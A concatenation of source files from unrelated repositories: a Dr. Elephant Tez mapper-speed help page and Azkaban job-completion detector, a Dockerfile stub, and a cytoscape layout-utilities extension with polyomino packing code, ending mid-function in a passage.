* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
  This analysis shows the speed of Tez input tasks.<br>
  This should help you adjust the size of your input splits so that the input is read faster.</p>
<p>
  The result of the analysis shows tasks that are significantly slow for the amount of data they need
  to read.
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="">
<h4 class="list-group-item-heading">Mapper Speed</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>20</td>
</tr>
<tr>
<td>Average task input size</td>
<td>509 MB</td>
</tr>
<tr>
<td>Average task speed</td>
<td>56 KB/s</td>
</tr>
<tr>
<td>Average task runtime</td>
<td>2hr 5min 54sec</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h3>Suggestions</h3>
<p>
  In Tez, input task sizes are computed by grouping splits together. Please check whether tez.grouping.split-count=XX is set. If it is set, XX tasks will be used to read the input data.
  Otherwise, verify whether tez.grouping.min-size and tez.grouping.max-size are set to adjust the number of tasks being launched.
  If there are multiple small files which need to be combined, use
  set hive.input.format=org.apache.hadoop.hive.ql.io.CombineHiveInputFormat;
  set mapreduce.input.fileinputformat.split.minsize and mapreduce.input.fileinputformat.split.maxsize<br>
  <br>
  If your tasks spend a lot of time reading the input splits, check hive.auto.convert.join.noconditionaltask.size
  to see if large hash tables are being used for map joins. If a large number of columns is being inserted, then try
  reducing hive.exec.orc.default.buffer.size. If your job inserts into multiple partitions, then set hive.optimize.sort.dynamic.partition
  to true.
<br>
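  For example (the sizes below are only illustrative):
  <ul>
    <li>set tez.grouping.min-size=268435456;</li>
    <li>set tez.grouping.max-size=1073741824;</li>
  </ul>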
</p>
<|start_filename|>app/com/linkedin/drelephant/tuning/AzkabanJobCompleteDetector.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.tuning;
import com.linkedin.drelephant.clients.azkaban.AzkabanJobStatusUtil;
import java.net.MalformedURLException;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import models.JobExecution;
import models.JobExecution.ExecutionState;
import models.JobSuggestedParamSet;
import models.JobSuggestedParamSet.ParamSetStatus;
import models.TuningJobExecutionParamSet;
import org.apache.log4j.Logger;
/**
* Job completion detector for azkaban jobs. This utility uses azkaban rest api to find out if the jobs in a flow are
* completed or not.
*/
public class AzkabanJobCompleteDetector extends JobCompleteDetector {
private static final Logger logger = Logger.getLogger(AzkabanJobCompleteDetector.class);
private AzkabanJobStatusUtil _azkabanJobStatusUtil;
public enum AzkabanJobStatus {
FAILED, CANCELLED, KILLED, SUCCEEDED, SKIPPED
}
/**
* Returns the list of completed executions
* @param inProgressExecutionParamSet List of executions (with corresponding param set) in progress
* @return List of completed executions
* @throws MalformedURLException MalformedURLException
* @throws URISyntaxException URISyntaxException
*/
protected List<JobExecution> getCompletedExecutions(List<TuningJobExecutionParamSet> inProgressExecutionParamSet)
throws MalformedURLException, URISyntaxException {
logger.info("Fetching the list of executions completed since last iteration");
List<JobExecution> completedExecutions = new ArrayList<JobExecution>();
try {
for (TuningJobExecutionParamSet tuningJobExecutionParamSet : inProgressExecutionParamSet) {
JobSuggestedParamSet jobSuggestedParamSet = tuningJobExecutionParamSet.jobSuggestedParamSet;
JobExecution jobExecution = tuningJobExecutionParamSet.jobExecution;
logger.info("Checking current status of started execution: " + jobExecution.jobExecId);
if (_azkabanJobStatusUtil == null) {
logger.info("Initializing AzkabanJobStatusUtil");
_azkabanJobStatusUtil = new AzkabanJobStatusUtil();
}
try {
Map<String, String> jobStatus = _azkabanJobStatusUtil.getJobsFromFlow(jobExecution.flowExecution.flowExecId);
if (jobStatus != null) {
for (Map.Entry<String, String> job : jobStatus.entrySet()) {
logger.info("Job Found:" + job.getKey() + ". Status: " + job.getValue());
if (job.getKey().equals(jobExecution.job.jobName)) {
if (job.getValue().equals(AzkabanJobStatus.FAILED.toString())) {
if (jobSuggestedParamSet.paramSetState.equals(ParamSetStatus.SENT)) {
jobSuggestedParamSet.paramSetState = ParamSetStatus.EXECUTED;
}
jobExecution.executionState = ExecutionState.FAILED;
} else if (job.getValue().equals(AzkabanJobStatus.SUCCEEDED.toString())) {
if (jobSuggestedParamSet.paramSetState.equals(ParamSetStatus.SENT)) {
jobSuggestedParamSet.paramSetState = ParamSetStatus.EXECUTED;
}
jobExecution.executionState = ExecutionState.SUCCEEDED;
} else if (job.getValue().equals(AzkabanJobStatus.CANCELLED.toString()) || job.getValue()
.equals(AzkabanJobStatus.KILLED.toString()) || job.getValue()
.equals(AzkabanJobStatus.SKIPPED.toString())) {
if (jobSuggestedParamSet.paramSetState.equals(ParamSetStatus.SENT)) {
jobSuggestedParamSet.paramSetState = ParamSetStatus.EXECUTED;
}
jobExecution.executionState = ExecutionState.CANCELLED;
}
if (jobExecution.executionState.equals(ExecutionState.SUCCEEDED) || jobExecution.executionState.equals(
ExecutionState.FAILED) || jobExecution.executionState.equals(ExecutionState.CANCELLED)) {
jobExecution.update();
jobSuggestedParamSet.update();
completedExecutions.add(jobExecution);
logger.info("Execution " + jobExecution.jobExecId + " is completed");
} else {
logger.info("Execution " + jobExecution.jobExecId + " is still in running state");
}
}
}
} else {
logger.info("No jobs found for flow execution: " + jobExecution.flowExecution.flowExecId);
}
} catch (Exception e) {
logger.error("Error in checking status of execution: " + jobExecution.jobExecId, e);
}
}
} catch (Exception e) {
logger.error("Error in fetching list of completed executions", e);
e.printStackTrace();
}
logger.info("Number of executions completed since last iteration: " + completedExecutions.size());
return completedExecutions;
}
}
| Viking-Bird/dr-elephant-test |
<|start_filename|>Dockerfile<|end_filename|>
FROM lanvige/node-deploy:9.5.0-alpine-onbuild
LABEL maintainer="<EMAIL>"
#ENTRYPOINT ["pm2", "start", "--no-daemon", "/app/bin/api"]
# CMD []
| ReganHe/koa2-ts-boilerplate |
<|start_filename|>src/index.js<|end_filename|>
// const impl = require('./core');
// // registers the extension on a cytoscape lib ref
// let register = function( cytoscape ){
// if( !cytoscape ){ return; } // can't register if cytoscape unspecified
// cytoscape( 'core', 'layoutUtilities', impl ); // register with cytoscape.js
// };
// if( typeof cytoscape !== 'undefined' ){ // expose to global cytoscape (i.e. window.cytoscape)
// register( cytoscape );
// }
// module.exports = register;
<|start_filename|>webpack.config.js<|end_filename|>
const path = require('path');
const pkg = require('./package.json');
const camelcase = require('camelcase');
const process = require('process');
const webpack = require('webpack');
const env = process.env;
const NODE_ENV = env.NODE_ENV;
const MIN = env.MIN;
const PROD = NODE_ENV === 'production';
let configs = [
{
devtool: PROD ? false : 'inline-source-map',
entry: './src/pose/pose.ts',
output: {
path: path.join(__dirname, 'src/pose'),
filename: 'pose.js',
library: 'pose',
libraryTarget: 'umd'
},
module: {
rules: [
{
test: /\.tsx?$/,
use: 'ts-loader',
exclude: /node_modules/,
},
/* {
test: /\.tsx?$/,
use: 'babel-loader',
exclude: /node_modules/,
} */
]
},
resolve: {
extensions: [ '.tsx', '.ts', '.js' ],
},
optimization: {
minimize: MIN ? true : false
}
},
{
devtool: PROD ? false : 'inline-source-map',
entry: './src/core/index.js',
output: {
path: path.join( __dirname ),
filename: pkg.name + '.js',
library: camelcase( pkg.name ),
libraryTarget: 'umd'
},
module: {
rules: [
/* { test: /\.js$/, exclude: /node_modules/, use: 'babel-loader' } */
]
},
externals: PROD ? Object.keys( pkg.dependencies || {} ) : [],
optimization: {
minimize: MIN ? true : false
}
}
];
module.exports = configs;
<|start_filename|>src/core/index.js<|end_filename|>
(function () {
'use strict';
// registers the extension on a cytoscape lib ref
var register = function (cytoscape) {
if (!cytoscape) {
return;
} // can't register if cytoscape unspecified
var options = {
idealEdgeLength: 50,
offset: 20,
desiredAspectRatio: 1,
polyominoGridSizeFactor: 1,
      utilityFunction: 1, // 1: maximizes adjusted fullness, 2: maximizes a weighted function of fullness and aspect ratio
componentSpacing: 80
};
var layoutUtilities = require("./layout-utilities");
cytoscape('core', 'layoutUtilities', function (opts) {
var cy = this;
// If 'get' is given as the param then return the extension instance
if (opts === 'get') {
return getScratch(cy).instance;
}
/**
* Deep copy or merge objects - replacement for jQuery deep extend
* Taken from http://youmightnotneedjquery.com/#deep_extend
* and bug related to deep copy of Arrays is fixed.
       * Usage: extendOptions({}, objA, objB)
*/
function extendOptions(out) {
out = out || {};
for (var i = 1; i < arguments.length; i++) {
var obj = arguments[i];
if (!obj)
continue;
for (var key in obj) {
if (obj.hasOwnProperty(key)) {
if (Array.isArray(obj[key])) {
out[key] = obj[key].slice();
} else if (typeof obj[key] === 'object') {
out[key] = extendOptions(out[key], obj[key]);
} else {
out[key] = obj[key];
}
}
}
}
return out;
}
options = extendOptions({}, options, opts);
function getScratch(eleOrCy) {
if (!eleOrCy.scratch("_layoutUtilities")) {
eleOrCy.scratch("_layoutUtilities", {});
}
return eleOrCy.scratch("_layoutUtilities");
}
// create a view utilities instance
var instance = layoutUtilities(cy, options);
// set the instance on the scratch pad
getScratch(cy).instance = instance;
if (!getScratch(cy).initialized) {
getScratch(cy).initialized = true;
}
// return the instance of extension
return getScratch(cy).instance;
});
};
if (typeof module !== 'undefined' && module.exports) { // expose as a commonjs module
module.exports = register;
}
if (typeof define !== 'undefined' && define.amd) { // expose as an amd/requirejs module
define('cytoscape-layout-utilities', function () {
return register;
});
}
if (typeof cytoscape !== 'undefined') { // expose to global cytoscape (i.e. window.cytoscape)
register(cytoscape);
}
})();
<|start_filename|>src/core/polyomino-packing.js<|end_filename|>
class Polyomino {
/**
* @param { number } width width of the polyomino in pixels
* @param { number } height height of the polyomino in pixels
     * @param { number } index index of the polyomino in the input
* @param { number } x1
* @param { number } y1
* @param { number } gridStep width and height of a grid square
*
* @description
* Note: width and height are added to establish centering according to old layout center
*
     * Since the width divided by the grid step can be calculated from the raw width, instead of adding new
     * variables I changed width and height and added a gridStep variable so that stepWidth and stepHeight can be calculated
     * from these.
*
     * The old width and height properties actually contained the width and height divided by the grid step, so stepWidth and
     * stepHeight are more convenient names for them.
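     *
     * For example (illustrative numbers): with width 95, height 45 and gridStep 10, stepWidth is 10 and stepHeight is 5.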
*/
constructor(x1, y1, width, height, gridStep, index) {
this.width = width;
this.height = height;
this.gridStep = gridStep;
this.grid = new Array(this.stepWidth);
for (var i = 0; i < this.stepWidth; i++) {
this.grid[i] = new Array(this.stepHeight);
for (var j = 0; j < this.stepHeight; j++) {
this.grid[i][j] = false;
}
}
this.index = index; //index of polyomino in the input of the packing function
this.x1 = x1; //kept to determine the amount of shift in the output
this.y1 = y1;//kept to determine the amount of shift in the output
this.location = new Point(-1, -1); //the grid cell coordinates where the polyomino was placed
/** inner center */
this.center = new Point(Math.floor(this.stepWidth / 2), Math.floor(this.stepHeight / 2));// center of polyomino
this.numberOfOccupiredCells = 0;
}
/**
* width of the polyomino divided by grid steps
*/
get stepWidth() {
return Math.floor(this.width / this.gridStep) + 1;
}
/**
* height of the polyomino divided by grid steps
*/
get stepHeight() {
return Math.floor(this.height / this.gridStep) + 1;
}
get x2() {
return this.x1 + this.width;
}
get y2() {
return this.y1 + this.height;
}
/**
* returns the center relative to location inside the grid
*/
get gridStepCenter() {
return this.center.diff(this.location);
}
getBoundingRectangle() {
const polyx1 = this.location.x - this.center.x;
const polyy1 = this.location.y - this.center.y;
return new BoundingRectangle(
polyx1,
polyy1,
// -1 because if length == 1 then x2 == x1
polyx1 + this.stepWidth - 1,
polyy1 + this.stepHeight - 1
);
}
}
class Point {
/**
*
* @param { number } x
* @param { number } y
*/
constructor(x, y) {
this.x = x;
this.y = y;
}
/**
* Returns other - this for x and y
* @param { Point } other
*/
diff(other) {
return new Point(
other.x - this.x,
other.y - this.y
);
}
}
class BoundingRectangle {
/**
* @param { number } x1
* @param { number } y1
* @param { number } x2
* @param { number } y2
*/
constructor(x1, y1, x2, y2) {
this.x1 = x1;
this.x2 = x2;
this.y1 = y1;
this.y2 = y2;
}
center() {
return new Point(
(this.x2 - this.x1) / 2,
(this.y2 - this.y1) / 2
);
}
}
class Cell {
/**
*
* @param { boolean } occupied
* @param { boolean } visited
*/
constructor(occupied, visited) {
this.occupied = occupied; //boolean to determine if the cell is occupied
this.visited = visited; //boolean to determine if the cell was visited before while traversing the cells
}
}
class Grid {
/**
* @param { number } width
* @param { number } height
* @param { number } step
*/
constructor(width, height, step) {
this.width = width;
this.height = height;
this.step = step;
//create and initialize the grid
this.grid = Array.from({ length: this.stepWidth },
((_) => Array.from({ length: this.stepHeight },
((_) => new Cell(false, false)))));
this.center = new Point(Math.floor(this.stepWidth / 2), Math.floor(this.stepHeight / 2));
this.occupiedRectangle = new BoundingRectangle(
Number.MAX_VALUE, Number.MAX_VALUE,
-Number.MAX_VALUE, -Number.MAX_VALUE
); // the bounding rectangle of the occupied cells in the grid
this.numberOfOccupiredCells = 0;
}
/**
* returns the width in terms of grid steps
*/
get stepWidth() {
return Math.floor(this.width / this.step) + 1;
}
/**
* returns the height in terms of grid steps
*/
get stepHeight() {
return Math.floor(this.height / this.step) + 1;
}
/**
* Given a list of cells, returns their direct unvisited, unoccupied neighboring cells. When the list is empty, the neighbors of all occupied cells are collected and expanded up to `level` rings. A small sketch follows this method.
*/
getDirectNeighbors(cells, level) {
var resultPoints = [];
if (cells.length == 0) {
for (var i = 0; i < this.stepWidth; i++) {
for (var j = 0; j < this.stepHeight; j++) {
if (this.grid[i][j].occupied) {
resultPoints = resultPoints.concat(this.getCellNeighbors(i, j));
}
}
}
var startIndex = 0;
var endIndex = resultPoints.length - 1;
for (var i = 2; i <= level; i++) {
if (endIndex >= startIndex) {
for (var j = startIndex; j <= endIndex; j++) {
resultPoints = resultPoints.concat(this.getCellNeighbors(resultPoints[j].x, resultPoints[j].y));
}
}
startIndex = endIndex + 1;
endIndex = resultPoints.length - 1;
}
} else {
cells.forEach(function (cell) {
resultPoints = resultPoints.concat(this.getCellNeighbors(cell.x, cell.y));
}.bind(this));
}
return resultPoints;
}
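/*
* Illustrative sketch (assumed values, not executed): with a single occupied cell at (5, 5),
* a call such as grid.getDirectNeighbors([], 2) first collects the 8 cells surrounding (5, 5),
* then expands once more to the unvisited cells around that ring, so roughly the free cells
* within a Chebyshev distance of 2 of (5, 5) are returned. Passing the previous result back in
* as `cells` expands the search frontier by one more ring.
*/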
/**
* given a cell at location i,j, returns the unvisited, unoccupied neighboring cells
* @param { number } i
* @param { number } j
*/
getCellNeighbors(i, j) {
var resultPoints = [];
//check all the 8 surrounding cells
if (i - 1 >= 0) {
if (!this.grid[i - 1][j].occupied && !this.grid[i - 1][j].visited) {
resultPoints.push({ x: i - 1, y: j });
this.grid[i - 1][j].visited = true;
}
}
if (i + 1 < this.stepWidth) {
if (!this.grid[i + 1][j].occupied && !this.grid[i + 1][j].visited) {
resultPoints.push({ x: i + 1, y: j });
this.grid[i + 1][j].visited = true;
}
}
if (j - 1 >= 0) {
if (!this.grid[i][j - 1].occupied && !this.grid[i][j - 1].visited) {
resultPoints.push({ x: i, y: j - 1 });
this.grid[i][j - 1].visited = true;
}
}
if (j + 1 < this.stepHeight) {
if (!this.grid[i][j + 1].occupied && !this.grid[i][j + 1].visited) {
resultPoints.push({ x: i, y: j + 1 });
this.grid[i][j + 1].visited = true;
}
}
if (i - 1 >= 0 && j - 1 >= 0) {
if (!this.grid[i - 1][j - 1].occupied && !this.grid[i - 1][j - 1].visited) {
resultPoints.push({ x: i - 1, y: j - 1 });
this.grid[i - 1][j - 1].visited = true;
}
}
if (i + 1 < this.stepWidth && j - 1 >= 0) {
if (!this.grid[i + 1][j - 1].occupied && !this.grid[i + 1][j - 1].visited) {
resultPoints.push({ x: i + 1, y: j - 1 });
this.grid[i + 1][j - 1].visited = true;
}
}
if (i - 1 >= 0 && j + 1 < this.stepHeight) {
if (!this.grid[i - 1][j + 1].occupied && !this.grid[i - 1][j + 1].visited) {
resultPoints.push({ x: i - 1, y: j + 1 });
this.grid[i - 1][j + 1].visited = true;
}
}
if (i + 1 < this.stepWidth && j + 1 < this.stepHeight) {
if (!this.grid[i + 1][j + 1].occupied && !this.grid[i + 1][j + 1].visited) {
resultPoints.push({ x: i + 1, y: j + 1 });
this.grid[i + 1][j + 1].visited = true;
}
}
return resultPoints;
}
/**
* a function to place a given polyomino in the cell i j on the grid
* @param { Polyomino } polyomino
* @param { number } i
* @param { number } j
*/
placePolyomino(polyomino, i, j) {
polyomino.location.x = i;
polyomino.location.y = j;
for (let k = 0; k < polyomino.stepWidth; k++) {
for (let l = 0; l < polyomino.stepHeight; l++) {
if (polyomino.grid[k][l]) { //if [k] [l] cell is occupied in polyomino
this.grid[k - polyomino.center.x + i][l - polyomino.center.y + j].occupied = true;
}
}
}
//update number of occupied cells
this.numberOfOccupiredCells += polyomino.numberOfOccupiredCells;
this.updateBounds(polyomino);
// reset visited cells to none
for (let x = 0; x < this.stepWidth; x++) {
for (let y = 0; y < this.stepHeight; y++) {
this.grid[x][y].visited = false;
}
}
}
/**
* Updates step rectangle bounds so that the `polyomino` fits
* @param { Polyomino } polyomino
*/
updateBounds(polyomino) {
let polyRect = polyomino.getBoundingRectangle();
this.occupiedRectangle.x1 = Math.min(this.occupiedRectangle.x1, polyRect.x1);
this.occupiedRectangle.x2 = Math.max(this.occupiedRectangle.x2, polyRect.x2);
this.occupiedRectangle.y1 = Math.min(this.occupiedRectangle.y1, polyRect.y1);
this.occupiedRectangle.y2 = Math.max(this.occupiedRectangle.y2, polyRect.y2);
}
/**
* a function to determine if a polyomino can be placed on the given cell i,j
* @param { Polyomino } polyomino
* @param { number } i
* @param { number } j
*/
tryPlacingPolyomino(polyomino, i, j) {
for (var k = 0; k < polyomino.stepWidth; k++) {
for (var l = 0; l < polyomino.stepHeight; l++) {
//return false if polyomino goes outside the grid when placed on i,j
if (k - polyomino.center.x + i >= this.stepWidth || k - polyomino.center.x + i < 0 || l - polyomino.center.y + j >= this.stepHeight || l - polyomino.center.y + j < 0) {
return false;
}
//return false if the polyomino cell and the corresponding main grid cell are both occupied
if (polyomino.grid[k][l] && this.grid[k - polyomino.center.x + i][l - polyomino.center.y + j].occupied) {
return false;
}
}
}
return true;
}
/**
* calculates the utility (fullness and aspect ratio) of placing a polyomino on cell i,j (a worked example follows this method)
* @param { Polyomino } polyomino
* @param { number } i
* @param { number } j
* @param { number } desiredAspectRatio
*/
calculateUtilityOfPlacing(polyomino, i, j, desiredAspectRatio) {
var result = {};
var actualAspectRatio = 1;
var fullness = 1;
var adjustedFullness = 1;
var x1 = this.occupiedRectangle.x1;
var x2 = this.occupiedRectangle.x2;
var y1 = this.occupiedRectangle.y1;
var y2 = this.occupiedRectangle.y2;
if (i - polyomino.center.x < x1) x1 = i - polyomino.center.x;
if (j - polyomino.center.y < y1) y1 = j - polyomino.center.y;
if (polyomino.stepWidth - 1 - polyomino.center.x + i > x2) x2 = polyomino.stepWidth - 1 - polyomino.center.x + i;
if (polyomino.stepHeight - 1 - polyomino.center.y + j > y2) y2 = polyomino.stepHeight - 1 - polyomino.center.y + j;
var width = x2 - x1 + 1;
var height = y2 - y1 + 1;
actualAspectRatio = width / height;
fullness = (this.numberOfOccupiredCells + polyomino.numberOfOccupiredCells) / (width * height);
if (actualAspectRatio > desiredAspectRatio) {
adjustedFullness = (this.numberOfOccupiredCells + polyomino.numberOfOccupiredCells) / (width * (width / desiredAspectRatio));
// height = width / desiredAspectRatio;
} else {
adjustedFullness = (this.numberOfOccupiredCells + polyomino.numberOfOccupiredCells) / ((height * desiredAspectRatio) * height);
// width = height * desiredAspectRatio;
}
result.actualAspectRatio = actualAspectRatio;
result.fullness = fullness;
result.adjustedFullness = adjustedFullness;
return result;
}
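/*
* Worked example (assumed numbers, for illustration only): if the occupied rectangle after
* placement would span 10 x 5 grid cells and 30 cells are occupied in total, then
* actualAspectRatio = 10 / 5 = 2 and fullness = 30 / 50 = 0.6. With desiredAspectRatio = 1,
* actualAspectRatio > desiredAspectRatio, so adjustedFullness = 30 / (10 * (10 / 1)) = 0.3,
* i.e. the fullness the packing would have if the height were stretched to the desired ratio.
*/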
}
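// Placement flow sketch (illustrative, assumed sizes and polyomino variables; mirrors how
// layout-utilities.js drives this API). `largestPoly` and `nextPoly` are hypothetical Polyomino
// instances built elsewhere.
/*
const grid = new Grid(2000, 1000, 10);                          // main grid with a 10 px step
grid.placePolyomino(largestPoly, grid.center.x, grid.center.y); // biggest polyomino goes in the middle
let cells = grid.getDirectNeighbors([], 1);                     // candidate cells around the occupied area
for (const cell of cells) {
  if (grid.tryPlacingPolyomino(nextPoly, cell.x, cell.y)) {
    const utility = grid.calculateUtilityOfPlacing(nextPoly, cell.x, cell.y, 1.0);
    // keep the cell with the best utility, then call grid.placePolyomino(nextPoly, bestX, bestY)
  }
}
*/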
module.exports = {
Grid: Grid,
Polyomino: Polyomino,
BoundingRectangle: BoundingRectangle,
Point: Point
};
<|start_filename|>src/core/general-utils.js<|end_filename|>
var generalUtils = {};
var polyominoPacking = require('./polyomino-packing');
const { Point } = require('./polyomino-packing');
//a function to remove duplicate objects in an array
generalUtils.uniqueArray = function (ar) {
var j = {};
ar.forEach(function (v) {
j[v + '::' + typeof v] = v;
});
return Object.keys(j).map(function (v) {
return j[v];
});
};
//a function to determine the grid cells that a line between points p0 and p1 passes through; a worked example follows the function
generalUtils.LineSuperCover = function (p0, p1) {
var dx = p1.x - p0.x, dy = p1.y - p0.y;
var nx = Math.floor(Math.abs(dx)), ny = Math.floor(Math.abs(dy));
var sign_x = dx > 0 ? 1 : -1, sign_y = dy > 0 ? 1 : -1;
var p = new polyominoPacking.Point(p0.x, p0.y);
var points = [new polyominoPacking.Point(p.x, p.y)];
for (var ix = 0, iy = 0; ix < nx || iy < ny;) {
if ((0.5 + ix) / nx == (0.5 + iy) / ny) {
// next step is diagonal
p.x += sign_x;
p.y += sign_y;
ix++;
iy++;
} else if ((0.5 + ix) / nx < (0.5 + iy) / ny) {
// next step is horizontal
p.x += sign_x;
ix++;
} else {
// next step is vertical
p.y += sign_y;
iy++;
}
points.push(new polyominoPacking.Point(p.x, p.y));
}
return points;
};
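// Worked example (assumed coordinates): for p0 = (0, 0) and p1 = (2, 1) the super cover visits
// (0,0) -> (1,0) -> (1,1) -> (2,1), i.e. every grid cell the segment touches, which is how edges
// get their cells marked as occupied in a component's polyomino.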
/**
* finds the current center of components
* @param { Array } components
*/
generalUtils.getCenter = function (components) {
// In case the platform doesn't have flatMap function
if (typeof Array.prototype['flatMap'] === 'undefined') {
Array.prototype['flatMap'] = function (f) {
const concat = (x, y) => x.concat(y);
const flatMap = (f, xs) => xs.map(f).reduce(concat, []);
return flatMap(f, this);
};
}
// @ts-ignore
let bounds = components.flatMap(component => component.nodes)
.map(node => ({
left: node.x,
top: node.y,
right: node.x + node.width - 1,
bottom: node.y + node.height - 1,
}))
.reduce((bounds, currNode) => ({
left: Math.min(currNode.left, bounds.left),
right: Math.max(currNode.right, bounds.right),
top: Math.min(currNode.top, bounds.top),
bottom: Math.max(currNode.bottom, bounds.bottom)
}), {
left: Number.MAX_VALUE,
right: -Number.MAX_VALUE,
top: Number.MAX_VALUE,
bottom: -Number.MAX_VALUE
});
return new Point((bounds.left + bounds.right) / 2, (bounds.top + bounds.bottom) / 2);
};
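// Usage sketch (hypothetical component data, matching the shape packComponents expects):
/*
const components = [
  { nodes: [{ x: 0, y: 0, width: 10, height: 10 }] },
  { nodes: [{ x: 90, y: 40, width: 10, height: 10 }] }
];
generalUtils.getCenter(components); // Point { x: 49.5, y: 24.5 }
*/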
module.exports = generalUtils;
<|start_filename|>src/core/layout-utilities.js<|end_filename|>
var generalUtils = require('./general-utils.js');
var polyominoPacking = require('./polyomino-packing');
const { Point, Polyomino } = require('./polyomino-packing');
const { getCenter } = require('./general-utils.js');
const pose = require('../pose/pose.js');
var layoutUtilities = function (cy, options) {
const isFn = fn => typeof fn === 'function';
var instance = {};
instance.setOption = function (name, val) {
options[name] = val;
};
instance.placeHiddenNodes = function (mainEles) {
mainEles.forEach(function (mainEle) {
var hiddenEles = mainEle.neighborhood().nodes(":hidden");
hiddenEles.forEach(function (hiddenEle) {
var neighbors = hiddenEle.neighborhood().nodes(":visible");
if (neighbors.length > 1) {
instance.nodeWithMultipleNeighbors(hiddenEle);
} else instance.nodeWithOneNeighbor(mainEle, hiddenEle);
});
});
};
instance.placeNewNodes = function (eles) {
var components = this.findComponents(eles);
var disconnectedComp = [];
for (var i = 0; i < components.length; i++) {
var oneNeig = false;
var multNeig = false;
var mainEle;
var multneighbors = [];
var positioned = [];
var x = 0;
var y = 0;
var isPositioned = false;
for (var j = 0; j < components[i].length; j++) {
var neighbors = components[i][j].neighborhood().nodes().difference(eles);
positioned.push(false);
if (neighbors.length > 1 && !isPositioned) {
multNeig = true;
positioned[j] = true;
multneighbors = neighbors;
instance.nodeWithMultipleNeighbors(components[i][j], multneighbors);
x = components[i][j].position("x");
y = components[i][j].position("y");
isPositioned = true;
}
else if (neighbors.length == 1 && !isPositioned) {
oneNeig = true;
mainEle = neighbors[0];
positioned[j] = true;
instance.nodeWithOneNeighbor(mainEle, components[i][j], eles);
x = components[i][j].position("x");
y = components[i][j].position("y");
isPositioned = true;
}
}
if (oneNeig || multNeig) {
for (var j = 0; j < components[i].length; j++) {
if (positioned[j] == false) {
var neighbors = components[i][j].neighborhood().nodes();
var positionedNeigbors = [];
var curr = components[i][j].neighborhood().nodes().difference(eles);
curr.forEach(function (ele) {
positionedNeigbors.push(ele);
})
for (var k = 0; k < neighbors.length; k++) {
if (positioned[components[i].indexOf(neighbors[k])]) {
positionedNeigbors.push(neighbors[k]);
}
}
if (positionedNeigbors.length > 1) {
instance.nodeWithMultipleNeighbors(components[i][j], positionedNeigbors);
} else if (positionedNeigbors.length == 1) instance.nodeWithOneNeighbor(positionedNeigbors[0], components[i][j]);
else {
var horizontalP = instance.generateRandom(options.offset, options.offset * 2, 0);
var verticalP = instance.generateRandom(options.offset, options.offset * 2, 0);
components[i][j].position("x", x + horizontalP);
components[i][j].position("y", y + verticalP);
}
positioned[j] = true;
}
}
}
else {
disconnectedComp.push(components[i]);
}
}
if (disconnectedComp.length >= 1) {
instance.disconnectedNodes(disconnectedComp);
}
};
instance.disconnectedNodes = function (components) {
var leftX = Number.MAX_VALUE;
var rightX = -Number.MAX_VALUE;
var topY = Number.MAX_VALUE;
var bottomY = -Number.MAX_VALUE;
// Check the x and y limits of all visible elements and store them in the variables above
cy.nodes(':visible').forEach(function (node) {
var halfWidth = node.outerWidth() / 2;
var halfHeight = node.outerHeight() / 2;
if (node.position("x") - halfWidth < leftX)
leftX = node.position("x") - halfWidth;
if (node.position("x") + halfWidth > rightX)
rightX = node.position("x") + halfWidth;
if (node.position("y") - halfHeight < topY)
topY = node.position("y") - halfHeight;
if (node.position("y") + halfHeight > bottomY)
bottomY = node.position("y") + halfHeight;
});
var radiusy = topY - bottomY;
var radiusx = rightX - leftX;
var innerRadius = (Math.sqrt(radiusx * radiusx + radiusy * radiusy)) / 2;
var centerX = (leftX + rightX) / 2;
var centerY = (topY + bottomY) / 2;
//var components = this.findComponents(newEles);
var numOfComponents = components.length;
var angle = 360 / numOfComponents;
var count = 1;
components.forEach(function (component) {
var distFromCenter = instance.generateRandom(innerRadius + options.offset * 6, innerRadius + options.offset * 8, 1);
var curAngle = angle * count;
var angleInRadians = curAngle * Math.PI / 180;
var x = centerX + distFromCenter * Math.cos(angleInRadians);
var y = centerY + distFromCenter * Math.sin(angleInRadians);
if (component.length == 1) {
component[0].position("x", x);
component[0].position("y", y);
}
else {
var positioned = [];
for (var i = 0; i < component.length; i++) {
positioned.push(false);
}
positioned[0] = true;
component[0].position("x", x);
component[0].position("y", y);
for (var i = 1; i < component.length; i++) {
var neighbors = component[i].neighborhood().nodes();
var positionedNeigbors = [];
for (var j = 0; j < neighbors.length; j++) {
if (positioned[component.indexOf(neighbors[j])]) {
positionedNeigbors.push(neighbors[j]);
}
}
if (positionedNeigbors.length > 1) {
instance.nodeWithMultipleNeighbors(component[i], positionedNeigbors);
} else if (positionedNeigbors.length == 1) instance.nodeWithOneNeighbor(positionedNeigbors[0], component[i]);
else {
var horizontalP = instance.generateRandom(options.offset, options.offset * 2, 0);
var verticalP = instance.generateRandom(options.offset, options.offset * 2, 0);
component[i].position("x", x + horizontalP);
component[i].position("y", y + verticalP);
}
positioned[i] = true;
}
}
count++;
});
};
instance.findComponents = function (newEles) {
var adjListArray = [];
var current = cy.nodes().difference(newEles);
newEles.forEach(function (ele) {
var neighbors = ele.neighborhood().nodes().difference(current);
var listOfIndexes = [];
neighbors.forEach(function (neigbor) {
var index = newEles.indexOf(neigbor);
listOfIndexes.push(index);
});
adjListArray.push(listOfIndexes);
});
// Mark all the vertices as not visited
var visited = [];
for (var v = 0; v < newEles.length; v++) {
visited.push(false);
}
var listOfComponents = [];
for (var v = 0; v < newEles.length; v++) {
var elesOfComponent = [];
if (visited[v] == false) {
// print all reachable vertices
// from v
